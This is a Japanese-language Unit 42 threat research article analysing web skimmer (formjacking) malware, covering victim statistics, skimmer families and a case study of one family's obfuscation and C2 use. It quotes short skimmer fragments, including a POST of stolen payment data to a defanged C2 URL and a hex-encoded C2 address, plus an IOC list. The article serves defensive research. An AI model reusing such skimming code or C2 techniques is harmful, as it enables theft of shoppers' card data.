[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/web-skimmer/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/web-skimmer/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# Webスキマーに関する詳細な考察

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 2 分で読めます  
Related Products  
[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/ja/product-category/next-generation-firewall-ja/ "Next-Generation Firewall")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Tao Yan](https://unit42.paloaltonetworks.com/ja/author/tao-yan/)
  * [Jin Chen](https://unit42.paloaltonetworks.com/ja/author/jin-chen/)
  * [Taojie Wang](https://unit42.paloaltonetworks.com/ja/author/taojie-wang/)
  * [Yu Fu](https://unit42.paloaltonetworks.com/ja/author/yu-fu/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2020年11月9日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Formjacking Attack](https://unit42.paloaltonetworks.com/ja/tag/formjacking-attack-ja/)
  * [Web skimmer](https://unit42.paloaltonetworks.com/ja/tag/web-skimmer-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/web-skimmer/?pdf=download&lg=ja&_wpnonce=edee969a51 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/web-skimmer/?pdf=print&lg=ja&_wpnonce=edee969a51 "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=Webスキマーに関する詳細な考察&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fweb-skimmer%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fweb-skimmer%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fweb-skimmer%2F&title=Webスキマーに関する詳細な考察 "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fweb-skimmer%2F&text=Webスキマーに関する詳細な考察 "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fweb-skimmer%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=Webスキマーに関する詳細な考察%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fweb-skimmer%2F "Share in Mastodon")

## 概要

フォームジャッキング攻撃は近年最も急速に増加しているサイバー攻撃の1つです。過去のブログ「[詳説 フォームジャッキング攻撃 処理の流れとテクニック](https://unit42.paloaltonetworks.com/anatomy-of-formjacking-attacks/)」でも説明したように、フォームジャッキング攻撃はデプロイは簡単でも検出は困難で、特にeコマースサイトへの攻撃で攻撃者に広く使用されています。2020年5月から9月までの間で、Unit 42はフォームジャッキング攻撃を受けた平均65,000件の悪意のあるHTMLページと24,000件のURLを検出しました。

本稿では最も広く使用されているフォームジャッキング攻撃の1つ「Webスキマー」について詳しく考察します。Webスキマーのサンプルをいくつか示し、攻撃中にデプロイされた攻撃ベクトルについて詳しく分析します。このブログがセキュリティリサーチャーにとって、実環境でWebスキマー攻撃がどのように発生するかを理解し、効果的な検出および防御メカニズムを開発するための一助になることを願っています。

パロアルトネットワークスの次世代ファイアウォールをご使用のお客様は、[WildFire](https://www.paloaltonetworks.jp/products/secure-the-network/wildfire)および[URLフィルタリング](https://www.paloaltonetworks.jp/products/threat-detection-and-prevention/web-security)セキュリティサブスクリプションによってフォームジャッキング攻撃から保護されています。

## 被害者分析

私たちは[WildFire](https://www.paloaltonetworks.jp/products/secure-the-network/wildfire)を使い、2019年10月から2020年10月までの間にWebスキマーマルウェアに侵害されたHTMLページを351,972件検出しました。これらのサンプルは6,684個の固有ドメイン名に属していました。

各ドメイン名の地理的な位置を導出して、図1に示すヒートマップを生成しました。このヒートマップは、大多数のドメイン名が米国にあることを示しています。また、ドメイン名はアフリカやオーストラリアを含む、ほぼすべての大陸に広く分散しています。
![このヒートマップでは、Webスキマーマルウェアによって侵害されたHTMLページを含むドメインが最も集中している地理的位置が紺青色で示されています。こうしたドメインが少ない地理的位置は淡い色で示されており、最も淡い色は淡黄色です。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-4.png) 図1: 2019年10月から2020年10月までの間にWebスキマーマルウェアに侵害されたHTMLページを含むドメインの地理的な位置

図2はドメイン名が属する国上位8カ国を示したものです。構成比が一番高いのは米国で、注目すべきは上位各国はみな国民の社会経済的地位が比較的高い点でしょう。これについては納得がいきます。ほとんどのスキマー攻撃はeコマースサイトを標的としていて、こうしたサイトに引き寄せられるのは購買力のあるユーザーだからです。
![Webスキマーマルウェアによって侵害された大多数のドメインの地理的位置として、本チームが識別した上位8か国は、米国、ドイツ、フランス、オランダ、英国、ロシア連邦、カナダ、オーストラリアです。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-5.png) 図2: 2019年10月から2020年10月までの間にWebスキマーマルウェアに侵害されたドメインの地理的位置に基づく上位8カ国

## Webスキマーファミリ分析

Webスキマー攻撃を理解するためにスキマーサンプルを分析した結果、スキマーHTMLページは、レイアウトやスタイルは異なるものの、同じようなJavaScriptコードを共有していることがわかりました。2019年10月から2020年10月までの間に収集した351,972件のHTMLページから、10,764件の悪意のある固有なJavaScriptスニペットを抽出することができました。

また、VirusTotalと自動化ツールを使い、特徴や機能に基づいて63種類の異なるマルウェアファミリを識別できました。図3は各スキマーファミリ関連のHTMLサンプル数を示したものです。すべてのマルウェアファミリのうち、よく使用されているものは19ファミリで、それぞれ1,000個以上のサンプルが確認されました。残りの44ファミリは、全ファミリ合わせて3,612ページでしか確認されませんでした。
![この図は、本チームが識別したさまざまなWebスキマーファミリに関連して収集したHTMLサンプルの数を示しています。family1に関連するサンプルは96,245で、family19に関連するサンプルは1,029です。残りの44ファミリは、全ファミリ合わせて3,612ページでしか確認されませんでした。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-6.png) 図3: 2019年10月から2020年10月までで確認されたWebスキマーファミリのHTMLサンプル数

図3からは、悪意のあるWebスキマーページの27%が、最もよく使用されているスキマーファミリ(図3のfamily1)に属することがわかります。さらに、1つのページが複数のスキマーファミリに属する可能性があることを考慮すると、上位3つのファミリ(family1、family2、family3)ですべてのWebスキマーページの65%を占めていることがわかります。

また、複数の悪意のあるJavaScriptが埋め込まれているページもありました。このようなページにおいて、異なるタイプのスキマーが意図的に一緒に使用されていることを示す証拠はありませんでした。むしろ、これらのページは、互いに無関係の異なる攻撃によってランダムに侵害された可能性が高いと思われます。

## Webスキマーのケーススタディ

2019年10月から2020年10月にかけ、スキマーの隠蔽テクニックとコマンド\&コントロール(C2)通信機能に進化が見られました。とくに図3に示した合計34,004サンプルのfamily7が典型的なスキミング攻撃であることがわかりました。本セクションでは、スキマーのしくみを理解するために、family7を詳しく調べていきます。また、family7のWebスキマーサンプルの複数の亜種を示します。これにより、セキュリティリサーチャーは、Webスキマー攻撃の複雑性とポリモーフィズムについて、とくにコードの構造や隠蔽テクニックの使われかたをよく理解できるようになるでしょう。

それでは、family7でよく見られるスキマーサンプルの1つから抽出したJavaScriptコードを見ていきましょう。以下のサンプル1をご覧ください。
![このJavaScriptコードは、family7でよく見られるWebスキマーサンプルの1つから抽出しました。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-7.png) 例1: family7のサンプル1から抽出したJavaScriptコード

攻撃者によって支払情報が盗まれ、データがPOSTリクエスト経由でC2サーバー(https://informaer\[.\]net/js/info\_jquery.js)に送信されたことがコードからわかります。関連する関数を以下に示します。

|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| e294b002686cad2df01bb59e3e2299f3e:'https://informaer\[.\]net/js/info\_jquery.js'  ... http.open('POST',be20b6410993ea4c7a48767775856514b.e294b002686cad2df01bb59e3e2299f3e,true); |

JavaScript文法の特性で、コードはさまざまな方法で表示可能です。各サンプルのコードが互いにほぼ同じでも、改良してまったく別の構造に書き直すことができます。以下のサンプル2はfamily7のコードの別亜種です。
![family7のこの変種は、例1とは異なり、従来の方法を使用してJavaScript関数を定義します。例1では、関数宣言に名前を付けてJavaScript関数を定義していました。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-8.png) 例2: family7のサンプル2から抽出したJavaScriptコード。

サンプル1では、関数宣言に名前を付けてJavaScript関数を定義していました。サンプル2では、従来の方法を使用してJavaScript関数を定義しています。侵入防止システム(IPS)シグネチャを使用してサンプル1とサンプル2の両方を検出・捕捉するには、両方の定義方法を考慮してパターンを記述しなくてはいけません。またこのサンプルでは、C2サーバーは機密情報を盗むためにhttps://cloudservice\[.\]tw/lib/jquery.phpを指しています。

難読化とポリモーフィズムは、悪意のあるコードの配信にも広く使用されています。悪意のあるコードを書き直すのではなく、[javascript-obfuscator](https://github.com/javascript-obfuscator/javascript-obfuscator)や[jfogs](https://github.com/zswang/jfogs)など数多くのオープンソースツールを利用することで、検出を容易に免れることができます。以下に、family7から抽出した別のコードを示します。
![Webスキマーfamily7のこのサンプルは、C2サーバーのURLを16進数形式でエンコードします。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-9.png) 例3: family7のサンプル3から抽出したJavaScriptコード

このサンプルでは、C2サーバーのURLは16進数形式でエンコードされています。

|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| "\\x68\\x74\\x74\\x70\\x73\\x3A\\x2F\\x2F\\x6F\\x6E\\x6C\\x69\\x6E\\x65\\x73\\x74\\x61\\x74\\x75\\x73\\x2E\\x73\\x69\\x74\\x65\\x2F\\x6A\\x73\\x2F\\x73\\x74\\x61\\x74\\x75\\x73\\x2E\\x6A\\x73" |

16進数文字列をデコードされた文字に変換すると、C2サーバーが"https://onlinestatus\[.\]site/js/status.js"を指していることがわかります。

上に示したサンプルのほか、family7では高度に難読化された悪意のあるコードも確認されました。これらのサンプルには異なるコードが含まれていますが、そのロジックや主なコードフローは似ているか、まったく同じでした。侵害されたWebサイトには、サイトごとに異なるコードがデプロイされているようで、1パターンしか持たないIPSシグネチャでは検出されにくくなっています。

ここで取り上げるべきもう1つの事実は、C2サーバーのURLがJavaScriptで変数として記述されており、攻撃者が比較的容易に改ざんできる点です。データセットを調べた結果、他の多くのスキマーサンプルでも、デコード/難読化解除後に、異なるC2サーバーを指しているものの、同じコードが使用されていることがわかりました。

図4は、family7から抽出されたすべてのC2サーバーとその使用状況統計を示しています。
![この図は、family7のWebスキマーサンプルで、どのくらい異なるC2サーバーが使用されているかを示しています。21,122のインスタンスが"onlinestatus\[.\]site"を使用しており、157のインスタンスが"web-stat.me"を使用しています](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-10.png) 図4: family7のWebスキマーサンプルで検出されたC2サーバー使用状況

図4から、family7の93%のWebスキマーサンプルで8つのドメインが使用されており、スキマーマルウェア攻撃が多くのC2サーバーを稼働させていることがわかります。C2サーバーがブロックまたは検出された場合、攻撃者は容易にそのC2サーバーを新しいドメイン名に置き換えることができます。

すべてのC2サーバーを特定することは非現実的です。悪意のあるJavaScriptサンプルの多くは、自動化を適用できない複雑な手法で高度に難読化されているためです。コードが進化し続け、IPが定期的に変更されることも、稼働するすべてのC2サーバーを収集するのを難しくしています。

また、一部のC2サーバーが複数のファミリで使用されていることも確認されており、これらのファミリが同じ攻撃によって管理または操作されている強力な証拠となっています。例えば、上述のサンプル2にあるhttps://cloudservice\[.\]tw/lib/jquery.phpは、別のファミリでも検出されています(図3の"other")。
![一部のC2サーバーは、複数のファミリで使用されています。このJavaScriptコードは、同じC2サーバーを使用する他のサンプルを示しています。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-11.png) 例4: 同じC2サーバーを使用する他のサンプルから抽出したJavaScriptコード

弊社は[WildFire](https://www.paloaltonetworks.jp/products/secure-the-network/wildfire)内でフォームジャッキング攻撃を対象とする高度な検出するモジュールを開発しました。図5は、過去5か月間(2020年5月～9月)における悪意のあるHTMLページと固有URLの月次検出件数を示したものです。平均でWildFireはフォームジャッキング攻撃を受けた65,000件の悪意のあるHTMLページ(図の"all hit")と24,000件の固有URL (図の"unique url hit")を検出しました。検出されたすべての対象には検証用の追加分析が自動で実施されます。WildFireがフォームジャッキング攻撃を正確に検出・識別し、[URLフィルタリング](https://www.paloaltonetworks.jp/products/threat-detection-and-prevention/web-security)がそれらのURLを悪意のあるURLとして識別・分類します。
![WildFireによって検出された悪意のあるURLの数(2020年5月～9月)。“All hit”は悪意のあるHTMLイメージの数で、“unique URL hit”は固有のURLの数です。"all hit"の数: 97,539 (5月)、84,882 (6月)、72,158 (7月)、79,695 (8月)、61,846 (9月)。"unique URL hit"の数: 27,155 (5月)、19,428 (6月)、21,336 (7月)、29,703 (8月)、25,160 (9月)。](https://unit42-preview.paloaltonetworks.com/wp-content/uploads/2020/11/word-image-12.png) 図5: WildFireが検出した悪意のあるURL数(2020年5月～9月)。"All hit"は悪意のあるHTMLイメージ数、"unique URL hit"は固有URL数

## 結論

Webスキマーは、侵害されたWebページに悪意のあるJavaScriptコードを挿入して機密情報を盗む、一般的なフォームジャッキング攻撃です。本稿では2019年10月から2020年10月にかけてスキマー攻撃を受けて感染した351,972件のHTMLページを分析し、スキマーマルウェアは非常に見つかりにくいこと、そして進化は続いているということを突き止めました。Webスキマー攻撃の痕跡は、あらゆる所で検出されました。

セキュリティチームがスキマーマルウェアを余さず検出するのは容易ではありません。スキマーマルウェアが使う最新手法をつねに把握・警戒し、臨機応変に検出戦略を策定していく必要があります。

Webサイト管理者は、組織内のすべてのシステム、コンポーネント、Webプラグインにパッチを適用することで、システム侵害の可能性を最小限に抑えられます。またWebコンテンツの整合性チェックを定期的に実施することもWebスキマー攻撃の検出・防御に役立ちます。

インターネット利用者はオンライン バンキング サービスに異常な使用状況や不正な支払いがないかどうか、オンラインアクティビティを追跡しておくことをお勧めします。直近のオンラインでの購入によってクレジットカード情報が盗まれたと判断される場合は、銀行に連絡してただちにカードを凍結ないし交換する必要があります。

パロアルトネットワークスの次世代ファイアウォールをご使用のお客様は、[WildFire](https://www.paloaltonetworks.jp/products/secure-the-network/wildfire)と[URLフィルタリング](https://www.paloaltonetworks.jp/products/threat-detection-and-prevention/web-security)セキュリティサブスクリプションにより、フォームジャッキング攻撃から保護されています。

## IOC

|-----------------------------------------------------------------------------------------------------------------------------------------|
| \* https://informaer\[.\]net/js/info\_jquery.js \* https://onlinestatus\[.\]site/js/status.js \* https://cloudservice\[.\]tw/lib/jquery.php |

トップに戻る

### タグ

* [Formjacking Attack](https://unit42.paloaltonetworks.com/ja/tag/formjacking-attack-ja/ "Formjacking Attack")
* [Web skimmer](https://unit42.paloaltonetworks.com/ja/tag/web-skimmer-ja/ "web skimmer")  
  [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research") [次ページ:xHuntキャンペーン: 新たに発見されたバックドアが削除された電子メールドラフトとコマンド\&コントロール用のDNSトンネリングを使用](https://unit42.paloaltonetworks.com/ja/xhunt-campaign-backdoors/ "xHuntキャンペーン: 新たに発見されたバックドアが削除された電子メールドラフトとコマンド&コントロール用のDNSトンネリングを使用")

### 目次

* 

### 関連記事

* [インターネット脅威の最新動向: フィッシング攻撃で偽装されやすいセクター、Webスキマーの事例分析 他](https://unit42.paloaltonetworks.com/ja/internet-threats-late-2022/ "article - table of contents")
* [Web脅威の動向 (2022年第2四半期): 悪質なJavaScriptダウンローダの進化](https://unit42.paloaltonetworks.com/ja/web-threats-malicious-javascript-downloader/ "article - table of contents")
* [Web脅威の動向: 古典的Webスキマーいまだ健在](https://unit42.paloaltonetworks.com/ja/web-threat-trends-web-skimmer/ "article - table of contents")

## 関連項目 マルウェア リソース

![Pictorial representation of ChainDrop, a self-propagating npm worm. An artistic depiction of a digital workspace featuring an open laptop with a red virus on the screen.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/03_Malware_Category_1920x900-7-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年8月6日 [#### ChainDropの脅威の概要:自己増殖型npmワームの内部](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/)

* [Blockchain](https://unit42.paloaltonetworks.com/ja/tag/blockchain-ja/ "blockchain")

* [ChainDrop](https://unit42.paloaltonetworks.com/ja/tag/chaindrop/ "ChainDrop")

* [Claude code](https://unit42.paloaltonetworks.com/ja/tag/claude-code/ "Claude code")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/chaindrop-npm-worm-analysis/ "ChainDropの脅威の概要:自己増殖型npmワームの内部")  
  ![Pictorial representation of the npm packages supply chain attack. Screen displaying code with a prominent alert symbol and the words 'VIRUS DETECTED' highlighted in red.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/05_Malware_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年6月2日 [#### npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/)

* [Credential Harvesting](https://unit42.paloaltonetworks.com/ja/tag/credential-harvesting-ja/ "Credential Harvesting")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Npm packages](https://unit42.paloaltonetworks.com/ja/tag/npm-packages/ "npm packages")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/monitoring-npm-supply-chain-attacks/ "npmの脅威の状況: アタックサーフェスと緩和策(6月2日更新)")  
  ![Pictorial representation of Screening Serpens. An illustrated blue snake is highlighted by a red circle against a night sky. The constellation serpens.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/05/Serpens-Iran-A-1920x900-2-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/threat-actor-groups.svg)脅威アクター グループ](https://unit42.paloaltonetworks.com/ja/category/threat-actor-groups-ja/) 2026年5月22日 [#### イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/)

* [Advanced Persistent Threat](https://unit42.paloaltonetworks.com/ja/tag/advanced-persistent-threat-ja/ "Advanced Persistent Threat")

* [AppDomainManager](https://unit42.paloaltonetworks.com/ja/tag/appdomainmanager/ "AppDomainManager")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/tracking-iran-apt-screening-serpens/ "イランAPT Screening Serpensによる2026年スパイ キャンペーンの追跡")  
  ![Pictorial representation of Iran cyber attacks. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/12_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月17日 [#### 脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/)

* [APK](https://unit42.paloaltonetworks.com/ja/tag/apk-ja/ "APK")

* [DDoS attacks](https://unit42.paloaltonetworks.com/ja/tag/ddos-attacks-ja/ "DDoS attacks")

* [GenAI](https://unit42.paloaltonetworks.com/ja/tag/genai-ja/ "GenAI")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/iranian-cyberattacks-2026/ "脅威情報: 2026年イランに関するサイバー リスクの激化(4月17日更新)")  
  ![Pictorial representation of the supply chain attack compromising Axios. A giant eye made of glowing binary code.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/04/02_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年4月1日 [#### 脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/)

* [API attacks](https://unit42.paloaltonetworks.com/ja/tag/api-attacks-ja/ "API attacks")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")

* [Powershell](https://unit42.paloaltonetworks.com/ja/tag/powershell-ja/ "Powershell")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/axios-supply-chain-attack/ "脅威概要:Axiosサプライ チェーン攻撃で広範に及ぶ影響")  
  ![Pictorial representation of TeamPCP. Glowing code on a screen where several word such as Crime, Hackers, and Security are highlighted in a contrasting color.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/03_Cybercrime_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年3月31日 [#### プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/)

* [CVE-2025-55182](https://unit42.paloaltonetworks.com/ja/tag/cve-2025-55182-ja/ "CVE-2025-55182")

* [GitHub](https://unit42.paloaltonetworks.com/ja/tag/github-ja/ "GitHub")

* [Infostealer](https://unit42.paloaltonetworks.com/ja/tag/infostealer-ja/ "Infostealer")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/teampcp-supply-chain-attacks/ "プロテクターを武器として利用する:セキュリティ インフラにおけるTeamPCPの多段階サプライ チェーン攻撃")  
  ![Pictorial representation of phishing campaign. A blurred image focusing on a person typing on a laptop with lines of code visible on the screen, illuminated in blue and red lights, suggestive of intense coding or cyber activities.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/03/06_Malware_Category_1920x900-3-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年3月24日 [#### 脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/)

* [Email scam](https://unit42.paloaltonetworks.com/ja/tag/email-scam/ "email scam")

* [Lure](https://unit42.paloaltonetworks.com/ja/tag/lure/ "lure")

* [Phishing](https://unit42.paloaltonetworks.com/ja/tag/phishing-ja/ "phishing")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/phishing-attackers-pose-as-panw-recruiters/ "脅威情報: パロアルトネットワークスの人材獲得チームになりすました採用スキーム")  
  ![Pictorial representation of Notepad++ supply chain compromise. A digital rendering of Earth from space, focusing on North and South America. The continents are illuminated in blue, with red lines and dots indicating data connections across various locations. Dark background highlights the vibrant network representation.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/02/11_Security-Technology_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/07/top-threats.svg)主なサイバー脅威](https://unit42.paloaltonetworks.com/ja/category/top-cyberthreats-ja/) 2026年2月11日 [#### 国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/)

* [Backdoor](https://unit42.paloaltonetworks.com/ja/tag/backdoor-ja/ "backdoor")

* [Cobalt Strike](https://unit42.paloaltonetworks.com/ja/tag/cobalt-strike-ja/ "Cobalt Strike")

* [DLL Sideloading](https://unit42.paloaltonetworks.com/ja/tag/dll-sideloading-ja/ "DLL Sideloading")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/notepad-infrastructure-compromise/ "国家支援型の脅威アクターがNotepad++のサプライチェーンを悪用")  
  ![Pictorial representation of runtime assembly attacks. Digital artwork of a glowing, futuristic shield disintegrating into small particles, set against a dark blue, bokeh-effect background.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/01/09_Business_email_compromise_Category_1920x900-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/) 2026年1月22日 [#### ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/)

* [API](https://unit42.paloaltonetworks.com/ja/tag/api-ja/ "API")

* [Google](https://unit42.paloaltonetworks.com/ja/tag/google-ja/ "Google")

* [JavaScript](https://unit42.paloaltonetworks.com/ja/tag/javascript-ja/ "JavaScript")  
  [今すぐ読む ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ja/real-time-malicious-javascript-through-llms/ "ランタイムアセンブリ攻撃の新たなフロンティア：LLMを活用したフィッシング用JavaScriptのリアルタイム生成")  
